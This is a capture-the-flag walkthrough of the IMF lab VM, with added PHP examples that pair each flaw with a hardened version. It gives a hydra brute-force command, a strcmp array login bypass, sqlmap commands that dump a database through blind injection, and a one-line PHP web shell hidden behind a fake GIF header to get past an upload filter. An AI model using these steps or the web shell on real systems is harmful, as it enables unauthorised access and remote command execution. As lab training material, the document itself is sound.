On the contact-us page we get 3 email addresses:
rmichaels@imf.local -> Director
akeith@imf.local -> Deputy Director
estone@imf.local -> Chief of Staff
While checking the source code of this page we get the first flag:
flag1{YWxsdGhlZmlsZXM=}
The flag contents are base64-encoded and decode to: allthefiles
Following the hint above, we also get the second flag by decoding the names of the JS files:
http://192.168.29.156/js/eVlYUnZjZz09fQ==.min.js -> 3
http://192.168.29.156/js/XUnRhVzVwYzNS.js -> 2
http://192.168.29.156/js/ZmxhZzJ7YVcxbVl.js -> 1
Combining them in that order gives the flag:
flag2{aW1mYWRtaW5pc3RyYXRvcg==} , hint: imfadministrator
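The reassembly above, as an added example that is not part of the original writeup: the three file names and the piece numbers are the ones listed above; the function names are my own. It strips the .js / .min.js suffixes, joins the pieces in order, decodes strictly (so stray characters fail instead of being ignored), checks the flagN{...} shape, and then decodes the inner hint.

```php
<?php
// Added example (not the VM's code): rebuild a base64 flag that was split
// across JavaScript file names, then decode the hint inside the braces.

function reassembleFlag(array $fragments): ?string
{
    // $fragments maps file name => piece number as given in the writeup.
    asort($fragments);                       // sort by piece number, keep names
    $joined = '';
    foreach (array_keys($fragments) as $name) {
        $joined .= preg_replace('/(\.min)?\.js$/', '', basename($name));
    }
    // strict=true rejects anything outside the base64 alphabet.
    $decoded = base64_decode($joined, true);
    if ($decoded === false || !preg_match('/^flag\d\{.+\}$/', $decoded)) {
        return null;                         // wrong order or damaged piece
    }
    return $decoded;
}

function decodeHint(string $flag): ?string
{
    if (!preg_match('/^flag\d\{(.+)\}$/', $flag, $m)) {
        return null;
    }
    $hint = base64_decode($m[1], true);
    return $hint === false ? null : $hint;
}

// File names and piece numbers exactly as listed in the writeup.
$files = [
    'http://192.168.29.156/js/eVlYUnZjZz09fQ==.min.js' => 3,
    'http://192.168.29.156/js/XUnRhVzVwYzNS.js'        => 2,
    'http://192.168.29.156/js/ZmxhZzJ7YVcxbVl.js'      => 1,
];

$flag = reassembleFlag($files);
echo $flag, PHP_EOL;
echo decodeHint($flag), PHP_EOL;
```

Run with php reassemble.php; the two lines printed are the flag2 value and the imfadministrator hint quoted above. Swapping any two piece numbers makes reassembleFlag() return null, which is why the piece order matters more than it first looks.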
After a bit of searching, I thought imfadministrator might be an endpoint, and it led to a login page:
Of course admin:admin didn't work:
This was the source code:
SQL injection, maybe? But the code said the password is hard-coded, and the error said 'invalid username', so username enumeration?
Let's make the list:
roger
alexander
elizabeth
admin
imfadmin
rmichaels
akeith
estone
rmichaels@imf.local
akeith@imf.local
estone@imf.local
Nothing worked, so I tried to automate things with hydra; the command and the wordlists for usernames and passwords are below:
hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt -s 80 -f http-get://192.168.90.184/imfadministrator
seclists' Names/names.txt for usernames and rockyou.txt for passwords
Result: aaliyah and 123456
That didn't work, so I tried something different:
Look at the responses for the same username with different passwords; something wasn't right, so I tried a username that could not possibly be valid:
I'm telling y'all this so that you can see what happens here and why people get stuck for hours.
This is because the site answers with HTTP 200 even on failure and puts the error in the response text, so a tool that keys on the status code reports false positives.
So I used Burp:
I also tried brute-forcing the password; nothing worked, so I tried directory enumeration on this endpoint:
I also looked at the source code again; this caught my curiosity:
If it says nothing about the password, only 'invalid username' and so on, then why is it taking the password as 'pass'?
Maybe what the back end means by hard-coded is that the password is already set and they compare the 'pass' string we send against it, so maybe we have to deal with the function that compares the strings? We can only guess... so maybe bypass the strcmp function:
In PHP's strcmp documentation, a user comment at the bottom describes this behaviour of the function:
We need to make sure 'pass' arrives as an empty array, which we can do in two ways:
way 1: Burp Intruder:
way 2: via array(''):
Just paste the above payload in the password field.
flag3{Y29udGludWVUT2Ntcw==}
hint: continueTOcms
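The comparison the writeup guesses at, as an added example rather than the VM's own login code: the vulnerable shape next to a hardened one. The user name, the placeholder password and the function names are assumptions (the writeup does not say which name passed enumeration, so rmichaels from the contact page is used). The point for a defender is that strcmp() with a loose == compares a type-juggled result, not the password.

```php
<?php
// Added example, not the VM's code. $_POST is simulated with plain arrays so
// the script runs from the CLI.

const VALID_USER         = 'rmichaels';            // assumption for the demo
const HARDCODED_PASSWORD = 'placeholder-password'; // assumption; real value not on the page

// Vulnerable form: strcmp() with a loose comparison.
// On PHP 5/7, "pass[]=" makes $post['pass'] an array; strcmp() emits a
// warning and returns NULL, and NULL == 0 is true, so the check passes.
// PHP 8 throws a TypeError instead, which is a crash rather than a bypass,
// but the code is still wrong.
function loginLoose(array $post): bool
{
    if (!isset($post['user'], $post['pass']) || $post['user'] !== VALID_USER) {
        return false;
    }
    return @strcmp($post['pass'], HARDCODED_PASSWORD) == 0;
}

// Hardened form: require strings, then compare in constant time.
// With a real credential store this would be password_hash() at enrolment
// and password_verify() here; hash_equals() is used because the writeup
// describes a hard-coded plain-text password.
function loginStrict(array $post): bool
{
    if (!isset($post['user'], $post['pass'])) {
        return false;
    }
    if (!is_string($post['user']) || !is_string($post['pass'])) {
        return false;                          // arrays never reach strcmp/hash_equals
    }
    if ($post['user'] !== VALID_USER) {
        return false;
    }
    return hash_equals(HARDCODED_PASSWORD, $post['pass']);
}

$good    = ['user' => VALID_USER, 'pass' => HARDCODED_PASSWORD];
$arrayed = ['user' => VALID_USER, 'pass' => ['']];   // what "pass[]=" arrives as

var_dump(loginStrict($good));      // the only combination that should pass
var_dump(loginStrict($arrayed));
var_dump(loginLoose($good));
try {
    var_dump(loginLoose($arrayed)); // true on PHP < 8: the bypass from the writeup
} catch (TypeError $e) {
    echo 'PHP 8 refuses the array: ', $e->getMessage(), PHP_EOL;
}
```

On PHP 7 the last var_dump prints true without the password; on PHP 8 it prints the TypeError message instead. loginStrict() returns false for the array input on every version because the is_string() check runs before any comparison, and hash_equals() also refuses to leak timing on the string path.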
Disallowed list:
Upload:
I tried this image, analyzed it, and with exiftool I got this:
after using the -b flag:
and the strings command we get:
Inside the CMS, the pagename parameter:
Running sqlmap to make sure:
we have to supply our session ID or else it rejects the request:
sqlmap --url http://192.168.90.184/imfadministrator/cms.php?pagename=disavowlist --cookie='PHPSESSID=9rn93n6m80d9hbtk2c6rkc0o75'
We can also confirm this manually:
' AND '1'='1
It's blind, so we'll have to use sqlmap:
Via that we can list the tables with the --tables option and dump them with:
sqlmap --url http://192.168.90.184/imfadministrator/cms.php?pagename=disavowlist --cookie='PHPSESSID=9rn93n6m80d9hbtk2c6rkc0o75' --dump -T pages
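The pagename lookup above, as an added example that is not the VM's cms.php: the injectable shape next to a parameterised one, driven by the same boolean probe the writeup uses by hand. An in-memory SQLite database stands in for MySQL so it runs offline; the table and column names are assumptions chosen to mirror the pages table that sqlmap dumps.

```php
<?php
// Added example, not the VM's code. Constructed table so the script runs
// without a real database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, pagename TEXT, body TEXT)');
$db->exec("INSERT INTO pages (pagename, body) VALUES
           ('home', 'constructed home page'),
           ('disavowlist', 'constructed disavow list')");

// Vulnerable: the request parameter is pasted into the SQL text, so a quote
// in the value ends the string and whatever follows runs as SQL.
function pageLoose(PDO $db, string $pagename): ?string
{
    $sql = "SELECT body FROM pages WHERE pagename = '$pagename'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['body'];
}

// Hardened: a bound parameter is always data; quotes in it never reach the parser.
function pageStrict(PDO $db, string $pagename): ?string
{
    $stmt = $db->prepare('SELECT body FROM pages WHERE pagename = ?');
    $stmt->execute([$pagename]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['body'];
}

// The writeup's manual probe, plus its false twin. A blind injection is
// recognised by the page behaving differently for the two.
$probeTrue  = "disavowlist' AND '1'='1";
$probeFalse = "disavowlist' AND '1'='2";

var_dump(pageLoose($db, 'disavowlist'));
var_dump(pageLoose($db, $probeTrue));    // same body: the condition ran as SQL
var_dump(pageLoose($db, $probeFalse));   // NULL: the condition ran and was false
var_dump(pageStrict($db, 'disavowlist'));
var_dump(pageStrict($db, $probeTrue));   // NULL: no page has that literal name
var_dump(pageStrict($db, $probeFalse));  // NULL: identical, nothing to infer from
```

With pageLoose() the true and false probes produce different responses, which is exactly the oracle a blind-injection tool needs; with pageStrict() both probes are just an unknown page name and the responses are identical, so there is nothing left to infer. Requires the pdo_sqlite extension, which ships with most PHP builds.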
Scan the QR code and find the flag: flag4{dXBsb2Fkcjk0Mi5waHA=}
Decode it and we get: uploadr942.php
When we go to this page we see this upload functionality:
We need to fool the WAF by passing the file as a GIF, adding GIF98 at the start:
GIF98
<?php $c=$_GET['cmd']; echo `$c`;?>
flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices
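What the upload filter above should have done, as an added example that is not the VM's uploadr942.php: a check that does not stop at a header string. The function names, the allowlist and the sample inputs are my own; the polyglot input is the payload from the writeup and the GIF is a constructed 1x1 image. One caveat worth knowing: PHP's own getimagesize() only compares the first three bytes ("GIF") when it identifies a GIF, so it is no stronger than the check the writeup gets past.

```php
<?php
// Added example, not the VM's code. Runs from the CLI on constructed bytes.

// Real file signatures; "GIF98" is not one of them.
const ALLOWED = [
    'gif'  => ["GIF87a", "GIF89a"],
    'png'  => ["\x89PNG\r\n\x1a\n"],
    'jpg'  => ["\xFF\xD8\xFF"],
    'jpeg' => ["\xFF\xD8\xFF"],
];

// Returns [accepted, reason, server-side name]. $bytes is the raw upload body.
function vetImageUpload(string $clientName, string $bytes): array
{
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return [false, 'extension not allowed', null];
    }
    // Compare the full signature for the claimed type, not a "GIF" prefix.
    $sigOk = false;
    foreach (ALLOWED[$ext] as $sig) {
        if (strncmp($bytes, $sig, strlen($sig)) === 0) {
            $sigOk = true;
            break;
        }
    }
    if (!$sigOk) {
        return [false, 'signature does not match extension', null];
    }
    // An image never needs a PHP open tag; a polyglot always carries one.
    // (A <?= sequence can occur by chance in binary data; if that false
    // positive matters, re-encode the image with GD instead of pattern-matching.)
    if (preg_match('/<\?(php\b|=)/i', $bytes)) {
        return [false, 'embedded PHP tag', null];
    }
    // Never keep the client's file name: a random name with a fixed extension
    // means no shell.php or x.php.gif lands on disk, and the target directory
    // should have script execution disabled regardless.
    $safeName = bin2hex(random_bytes(16)) . '.' . $ext;
    return [true, 'ok', $safeName];
}

// Inputs: the writeup's payload, and a constructed 1x1 GIF89a.
$polyglot = "GIF98\n<?php \$c=\$_GET['cmd']; echo `\$c`;?>";
$tinyGif  = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');

print_r(vetImageUpload('shell.gif', $polyglot));  // rejected: signature
print_r(vetImageUpload('shell.php', $polyglot));  // rejected: extension
print_r(vetImageUpload('pixel.gif', $tinyGif));   // accepted, random name
```

The order of the checks is deliberate: the cheap extension and signature tests run first, the content scan runs only on files that already look like images, and the file name the client chose is never used for anything except its extension.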